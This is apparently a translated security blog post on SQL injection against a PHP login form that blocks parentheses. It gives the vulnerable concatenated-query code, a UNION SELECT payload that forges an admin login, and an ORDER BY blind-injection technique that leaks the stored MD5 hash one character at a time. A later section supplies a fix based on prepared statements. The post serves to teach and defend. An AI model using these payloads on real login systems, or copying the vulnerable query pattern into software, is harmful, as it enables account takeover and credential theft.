0x01 Scenario
Login code:
<?php
$username = $_POST['username'];
$password = $_POST['password'];
if (filter($username)) {
    // parentheses found: the request is filtered out here
    // (filter() is not shown; it rejects usernames containing parentheses)
} else {
    // the username is concatenated straight into the SQL text
    $sql = "SELECT * FROM admin WHERE username='" . $username . "'";
    $result = mysql_query($sql);   // mysql_* functions kept as in the original (removed in PHP 7)
    @$row = mysql_fetch_array($result);
    if (isset($row) && $row['username'] === 'admin') {
        if ($row['password'] === md5($password)) {
            // Login successful
        } else {
            die("password error!");
        }
    } else {
        die("username does not exist!");
    }
}
With the following table:

mysql> select * from admin where username='admin';
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
1 row in set (0.00 sec)
In this ordinary scenario, when a user logs in, a wrong username is answered with a "username error" message, while a correct username with the wrong password is answered with a "password error" message.
0x02 Logging in with UNION SELECT
Seeing this logic, the first idea is of course to use union select directly to forge a password and log in:

username=' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b&password=1

mysql> select * from admin where username='' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b';
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | c4ca4238a0b923820dcc509a6f75849b |
+----+----------+----------------------------------+
1 row in set (0.00 sec)
But what if we want to obtain the real password?
0x03 Taking off with ORDER BY
The login messages give us a boolean condition; how can order by be used to exploit that boolean?

mysql> select * from admin where username='' or 1 union select 1,2,'5' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | 2        | 5                                |
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

mysql> select * from admin where username='' or 1 union select 1,2,'6' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
|  1 | 2        | 6                                |
+----+----------+----------------------------------+
2 rows in set (0.01 sec)

mysql> select * from admin where username='' or 1 union select 1,2,'51' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | 2        | 51                               |
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

mysql> select * from admin where username='' or 1 union select 1,2,'52' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
|  1 | 2        | 52                               |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)
By deciding one character at a time in this way, the password can be recovered.
Obviously this method is rarely used in practice, but it may come in handy in certain specific environments, such as a lab environment: if parentheses are filtered, the other blind injection techniques are basically useless, and order by can be used to inject instead.
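The fix the post's ending points toward, as an added example that is not code from the original post or from p0: the same login rewritten with a parameterised query, password_hash()/password_verify() instead of an unsalted MD5 comparison, and a single failure result, demonstrated against an in-memory SQLite database with constructed data. The `login()` function, the `admin` table contents, the demo passwords and the dummy hash are all assumptions of this example, not things the post states.

```php
<?php
declare(strict_types=1);

// Added example, not code from the original post. Same login flow, rewritten so
// that neither the UNION SELECT login nor the ORDER BY oracle works.
// Assumptions (not in the original): the password column stores password_hash()
// output instead of an unsalted MD5, and a PDO handle $pdo is available.

function login(PDO $pdo, string $username, string $password): bool
{
    // Placeholder binding: the username is sent as data, never spliced into the
    // SQL text, so quotes, UNION and ORDER BY inside it are just characters to
    // compare. This replaces the parentheses blacklist (filter()) of the original.
    $stmt = $pdo->prepare('SELECT username, password FROM admin WHERE username = ? LIMIT 1');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Verify against a throw-away hash when the user is missing, so a bad
    // username and a bad password cost the same time. Computed once per process.
    static $dummyHash = null;
    if ($dummyHash === null) {
        $dummyHash = password_hash('constructed-dummy-password', PASSWORD_DEFAULT);
    }
    $storedHash = ($row !== false) ? (string) $row['password'] : $dummyHash;
    $hashOk = password_verify($password, $storedHash);

    // Single boolean result: the caller prints one message for every failure,
    // removing the "username does not exist" / "password error" split that the
    // post turns into a boolean oracle.
    return $row !== false && $hashOk;
}

// Self-contained demo on an in-memory SQLite database (constructed data).
if (PHP_SAPI === 'cli') {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
    $ins = $pdo->prepare('INSERT INTO admin (username, password) VALUES (?, ?)');
    $ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

    $cases = [
        // [username, password, expected result]
        ['admin', 'correct horse', true],
        ['admin', 'wrong', false],
        ['nobody', 'wrong', false],
        // The two payload shapes from the post, now handled as literal usernames.
        ["' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b", '1', false],
        ["' or 1 union select 1,2,'5' order by 3", 'x', false],
    ];
    foreach ($cases as [$u, $p, $expected]) {
        $result = login($pdo, $u, $p);
        printf("%-64s %s\n", var_export($u, true), $result === $expected ? 'ok' : 'MISMATCH');
    }
    // A failed login returns false only; the caller should answer every failure with
    // the same message, e.g. http_response_code(401); die('invalid username or password');
}
```

Run it with `php` from the command line (pdo_sqlite is bundled with standard PHP builds). The two payload strings are the post's own; bound as a parameter they are compared as literal usernames, so neither the injected UNION row nor the ORDER BY ordering ever reaches the query plan, and because both failure cases return the same false value the caller has no "username" versus "password" message to hand out, which was exactly the boolean the ORDER BY trick consumed.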
Copyright belongs to the author.
For commercial reproduction please contact the author for authorization; for non-commercial reproduction please credit the source.
Author: p0
Link: http://p0sec.net/index.php/archives/106/
Source: http://p0sec.net/
